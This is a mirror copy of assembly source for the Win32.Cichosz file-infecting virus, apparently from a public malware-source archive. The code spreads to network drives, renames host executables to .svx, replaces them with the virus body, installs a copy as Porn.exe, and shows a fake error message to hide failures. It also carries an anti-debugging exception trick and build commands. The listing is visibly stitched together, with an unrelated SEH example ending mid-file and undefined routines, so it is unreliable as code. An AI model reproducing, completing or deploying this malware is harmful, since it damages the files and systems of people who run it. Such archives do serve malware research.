mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-16 12:08:36 +00:00
329 lines
10 KiB
NASM
329 lines
10 KiB
NASM
;============================================================
|
|
;=== Win32.Cichosz virus. Coded by Necronomikon[ShadowvX] ===
|
|
;============================================================
|
|
;Virusname: Win32.Cichosz
|
|
;Author: Necronomikon
|
|
;Date:26-12-00
|
|
;Features: - Worming: It checks all drives and if it have access to
|
|
;a network drive,it infect there some files. (thanks to SnakeByte)
|
|
; - Fuck Debuggers
|
|
; - Display MessageBox
|
|
; - Renames infected files to svx
|
|
;---------------------------------------
|
|
;--- based on Win32.3x3 by BumbleBee ---
|
|
;---------------------------------------
|
|
;======================================================
|
|
; . To compile:
|
|
;
|
|
; tasm32 /ml /m3 cichosz,,;
|
|
; tlink32 -Tpe -c cichosz,cichosz,, import32.lib
|
|
;=======================================================
|
|
.386
|
|
locals
|
|
jumps
|
|
.model flat,STDCALL
|
|
|
|
extrn ExitProcess:PROC
|
|
extrn FindFirstFileA:PROC
|
|
extrn FindNextFileA:PROC
|
|
extrn FindClose:PROC
|
|
extrn GetCommandLineA:PROC
|
|
extrn MoveFileA:PROC
|
|
extrn CopyFileA:PROC
|
|
extrn WinExec:PROC
|
|
extrn MessageBoxA:PROC
|
|
extrn GetSystemTime:PROC
|
|
extrn CloseHandle:PROC
|
|
extrn GetFileSize:PROC
|
|
extrn GetCurrentDirectoryA:PROC
|
|
extrn SetCurrentDirectoryA:PROC
|
|
extrn DeleteFileA:PROC
|
|
|
|
L equ <LARGE>
|
|
|
|
.DATA
|
|
|
|
szTitle db "Structured Exception Handler example",0
|
|
szMessage db "Intercepted General Protection Fault!",0
|
|
|
|
.code
|
|
|
|
start:
|
|
call setupSEH ; The call pushes the offset
|
|
; past it in the stack rigth?
|
|
; So we will use that :)
|
|
exceptionhandler:
|
|
mov esp,[esp+8] ; Error gives us old ESP
|
|
; in [ESP+8]
|
|
|
|
push 00000000h ; Parameters for MessageBoxA
|
|
push offset szTitle
|
|
push offset szMessage
|
|
push 00000000h
|
|
call MessageBoxA
|
|
|
|
push 00000000h
|
|
call ExitProcess ; Exit Application
|
|
|
|
setupSEH:
|
|
push dword ptr fs:[0] ; Push original SEH handler
|
|
mov fs:[0],esp ; And put the new one (located
|
|
; after the first call)
|
|
|
|
mov ebx,0BFF70000h ; Try to write in kernel (will
|
|
mov eax,012345678h ; generate an exception)
|
|
xchg eax,[ebx]
|
|
|
|
end start
|
|
windoze db 'C:\Windows\System\Sys\Porn.exe',0
|
|
fHnd dd ? ; handle for files
|
|
shit dd 0 ; for write process
|
|
cont0 dd 0 ; for loops
|
|
cont1 db 0 ; for loops
|
|
|
|
findData db 316 dup(0) ; data for ffirst and fnext
|
|
fMask db '*.EXE' ; mask for finding exe files
|
|
ffHnd dd ? ; handle for ffirst and fnext
|
|
hostName db 260 dup(0) ; space for save host name
|
|
hwoArgs db 260 dup(0) ; host without arguments
|
|
futureHostName db 260 dup(0) ; space for save new host name
|
|
chDir db 260 dup(0) ; space for save current dir
|
|
commandLine dd ? ; handle for command line
|
|
sysTimeStruct db 16 dup(0) ; space for system time struct
|
|
|
|
|
|
; virus id and author
|
|
virusId db 'Win32.CICHOSZ coded by Necronomikon',0
|
|
; message
|
|
mess db 'This is my 1st Win32-Virus.'
|
|
db 0dh,0ah,'Greetingz tha whole ShadowvX Group!',0
|
|
|
|
bmess db 'Invalid call in shared memory 0x0cf689000.',0
|
|
;--------------------
|
|
push offset Buffer ; offset of the buffer
|
|
push 60h ; buffer-lenght
|
|
call GetLogicalDriveStrings
|
|
|
|
cmp eax, 0 ; did we fail ?
|
|
je StopThis
|
|
|
|
lea esi, Buffer
|
|
|
|
WhatDrive:
|
|
push esi
|
|
call GetDriveType
|
|
cmp eax, DRIVE_REMOTE ; we got a network drive
|
|
jne NoNetwork
|
|
|
|
; esi still contains the offset of
|
|
; the root dir on the drive
|
|
call infectDrive ; so we infect it.. ;P
|
|
|
|
NoNetwork:
|
|
Call GetNextZero ; place esi after the next zero
|
|
; ( searching from esi onwards )
|
|
cmp byte ptr [esi],0
|
|
jne WhatDrive ; if we searched all drives we
|
|
; end here, otherwise we check the type
|
|
StopThis:
|
|
ret
|
|
|
|
Buffer db 60h dup (?) ; I don't know that many ppl with 20+
|
|
; Drives so this buffersize should be
|
|
; big enough ;)
|
|
;----------------------------------------
|
|
virus:
|
|
lea eax,sysTimeStruct ; check for payload
|
|
push eax
|
|
call GetSystemTime ; get system time
|
|
|
|
lea eax,sysTimeStruct
|
|
cmp word ptr [eax+2],12
|
|
jne skipPay
|
|
cmp word ptr [eax+6],14
|
|
jne skipPay
|
|
|
|
push L 1030h ; show a message box
|
|
lea eax,virusId
|
|
push eax
|
|
lea eax,mess
|
|
push eax
|
|
push L 0
|
|
call MessageBoxA
|
|
|
|
skipPay:
|
|
call GetCommandLineA ; get command line
|
|
mov dword ptr [commandLine],eax
|
|
|
|
xor esi,esi ; copy it to get host path
|
|
lea edi,hostName ; needed for infection process
|
|
copyLoop:
|
|
mov bl,byte ptr [eax+esi]
|
|
mov byte ptr [edi+esi],bl
|
|
cmp bl,0
|
|
je skipArgs
|
|
inc esi
|
|
jmp copyLoop
|
|
|
|
skipArgs: ; copy host name without args
|
|
xor esi,esi
|
|
lea edi,hwoArgs
|
|
lea eax,hostName
|
|
copyLoopb:
|
|
mov bl,byte ptr [eax+esi]
|
|
mov byte ptr [edi+esi],bl
|
|
cmp bl,'.'
|
|
je ffirst
|
|
inc esi
|
|
jmp copyLoopb
|
|
|
|
ffirst:
|
|
mov dword ptr [edi+esi],'EXE.' ; add extension
|
|
; now we have arguments in
|
|
; hostName and name only in
|
|
; hwoArgs
|
|
push 0
|
|
lea eax,windoze
|
|
push eax
|
|
lea eax,hwoArgs
|
|
push eax
|
|
call CopyFileA ; install in windows dir
|
|
|
|
lea eax,chDir
|
|
push eax ; get current directory
|
|
push 260
|
|
call GetCurrentDirectoryA
|
|
cmp eax,0
|
|
|
|
retDir:
|
|
lea eax,chDir
|
|
push eax ; restore work directory
|
|
call SetCurrentDirectoryA
|
|
|
|
|
|
fnext:
|
|
call infectFile
|
|
skipThis:
|
|
|
|
lea eax,findData
|
|
push eax
|
|
push dword ptr [ffHnd]
|
|
call FindNextFileA ; find next *.EXE
|
|
cmp eax,0
|
|
jne fnext
|
|
|
|
push dword ptr [ffHnd]
|
|
call FindClose ; close ffist/fnext handle
|
|
|
|
execHost:
|
|
xor esi,esi ; copy hostName to future host Name
|
|
lea edi,futureHostName
|
|
lea eax,hostName
|
|
copyLoop2:
|
|
mov bl,byte ptr [eax+esi]
|
|
mov byte ptr [edi+esi],bl
|
|
cmp bl,'.'
|
|
je contExec
|
|
inc esi
|
|
jmp copyLoop2
|
|
|
|
contExec:
|
|
mov dword ptr [edi+esi],'svx.' ; change ext to svx
|
|
|
|
push 1
|
|
push edi
|
|
call WinExec ; exec host
|
|
cmp eax,32 ; exec error?
|
|
jb lastOptionStealth ; je stealth with lame message
|
|
|
|
goOut:
|
|
push L 0h
|
|
call ExitProcess ; exit program
|
|
|
|
infectFile:
|
|
xor esi,esi ; copy file found name to
|
|
lea edi,futureHostName ; future host name
|
|
lea eax,findData
|
|
add eax,44
|
|
icopyLoop:
|
|
mov bl,byte ptr [eax+esi]
|
|
mov byte ptr [edi+esi],bl
|
|
cmp bl,'.'
|
|
je continueInf
|
|
inc esi
|
|
jmp icopyLoop
|
|
|
|
continueInf:
|
|
mov dword ptr [edi+esi],'svx.' ; change ext to svx
|
|
|
|
push eax
|
|
push edi
|
|
push eax
|
|
call MoveFileA ; rename the host to *.svx
|
|
|
|
pop eax
|
|
push 0
|
|
push eax
|
|
lea eax,hwoArgs
|
|
push eax
|
|
call CopyFileA ; copy current host to new host
|
|
; (virus body)
|
|
ret
|
|
|
|
lastOptionStealth: ; lame mess when we can't exec host
|
|
push L 1010h ; user can think the program is
|
|
push L 0h ; corrupted or windows goes
|
|
lea eax,bmess ; wrong (very common =] )
|
|
push eax
|
|
push L 0
|
|
call MessageBoxA
|
|
jmp goOut
|
|
|
|
dcLoop:
|
|
push L 0
|
|
lea eax,shit
|
|
push eax
|
|
push L 1
|
|
push edi
|
|
push dword ptr [fHnd]
|
|
|
|
cmp byte ptr [edi],0ffh
|
|
jne skipFF
|
|
|
|
dec dword ptr [cont0]
|
|
call addFF
|
|
inc edi
|
|
|
|
skipFF:
|
|
inc edi
|
|
dec dword ptr [cont0]
|
|
cmp dword ptr [cont0],0
|
|
jne dcLoop
|
|
|
|
push dword ptr [fHnd] ; close file
|
|
call CloseHandle
|
|
|
|
addFF:
|
|
xor ecx,ecx
|
|
mov cl,byte ptr [edi+1]
|
|
mov byte ptr [cont1],cl
|
|
cmp cl,0
|
|
jne addFFLoop
|
|
ret
|
|
|
|
addFFLoop:
|
|
push L 0
|
|
lea eax,shit
|
|
push eax
|
|
push L 1
|
|
push edi
|
|
push dword ptr [fHnd]
|
|
dec byte ptr [cont1]
|
|
cmp byte ptr [cont1],0
|
|
jne addFFLoop
|
|
|
|
ret
|
|
Ends
|
|
End virus
|
|
|